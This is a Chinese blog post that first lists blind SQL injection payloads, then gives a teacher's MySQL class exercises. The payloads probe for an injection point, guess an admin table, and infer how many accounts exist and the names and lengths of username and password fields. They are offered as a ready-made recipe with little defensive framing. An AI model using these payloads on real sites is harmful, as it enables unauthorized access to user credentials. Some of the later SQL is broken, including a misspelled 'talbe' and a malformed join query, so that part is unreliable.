标签归档:SQL

sql

SQL注入语句五例

SQL注入语句是学习SQL语句过程中需要掌握的知识,下面就为您介绍5个标准的SQL注入语句,希望对您了解SQL注入语句有所帮助。

1.判断有无注入点

  1. ; and 11=1 and 1=2

 

2.猜表一般的表的名称无非是admin adminuser user pass password 等..

  1. and 0<>(select count(*) from *)
  2. and 0<>(select count(*) from admin) —判断是否存在admin这张表

 

3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个

  1. and 0<(select count(*) from admin)
  2. and 1<(select count(*) from admin)

 

4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称.

  1. and 1=(select count(*) from admin where len(*)>0)–
  2. and 1=(select count(*) from admin where len(用户字段名称name)>0)
  3. and 1=(select count(*) from admin where len(_blank>密码字段名称password)>0)

 

5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止

  1. and 1=(select count(*) from admin where len(*)>0)
  2. and 1=(select count(*) from admin where len(name)>6) 错误
  3. and 1=(select count(*) from admin where len(name)>5) 正确 长度是6
  4. and 1=(select count(*) from admin where len(name)=6) 正确
  5. and 1=(select count(*) from admin where len(password)>11) 正确
  6. and 1=(select count(*) from admin where len(password)>12) 错误 长度是12
  7. and 1=(select count(*) from admin where len(password)=12) 正确

延伸阅读

所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击.

今天上课凯哥默写的sql语句,最常用的

创建一个表名为user,
id  整型
username   字符   15
password   字符   32
引擎为myisam
字符集为utf-8

凯子曰:create table user(
id int default null,
username varchar(15) default null,
password varchar(32) not null

)engine=myisam  default charset=utf8;
在id之后加入一个uid字段 类型  整型
凯子曰:alter table user  add  uid int after id;

请将uid的名字改为pid

凯子曰:  alter table user change uid pid int;

再pid的字段类型改为smallint

凯子曰: alter table user modify pid smallint;

将表名改为 test_user

凯子曰:alter talbe user rename test_user;

删除字段pid

alter table user drop pid;

插入语句。要求向 test_user表当中,插入 username为abc,密码为bcd
凯子曰:insert into test_user(username,password) values(‘abc’,’bcd’);

删除test_user表中id>8的数据,并且islock=1;

 

更新  test_news  title等于facai, 点击数hits加1,
content 改为哈哈。查找, id>8  小于16
凯子曰: update  test_news set title=’facai’,hits=hits+1,content=’哈哈’ where id>8 and id<16;
找出test_user表当中,用户名唯 一的信息啊
select distinct username from test_user;
在test_user 中请以 sf字段字段,对用户进行分组。
select * from test_user group by sf;
请查询posts表,先以istop先行排序,降序。再以id升序排统。要求,
从第9条开始,取5条。条件  id>100
select * from posts where id>100 order by istop desc,id limit 9,5;
查询user表和posts表,列出user表的id,username,jf,
分别给出别名uuid,uname,ujf,列出post表的id,uid,title,content,别名为
pid,puid,ptitle,pcotent  条件为user表的id等posts表的uid,同时给出
user表和post别给别名。别名分别为u1,和p1
select u1.id as uuid,u1.username as uname,u1.jf as ujf from user as u1 post as p1 where u1.id=p1.uid;

 

 

上山若水   十月九日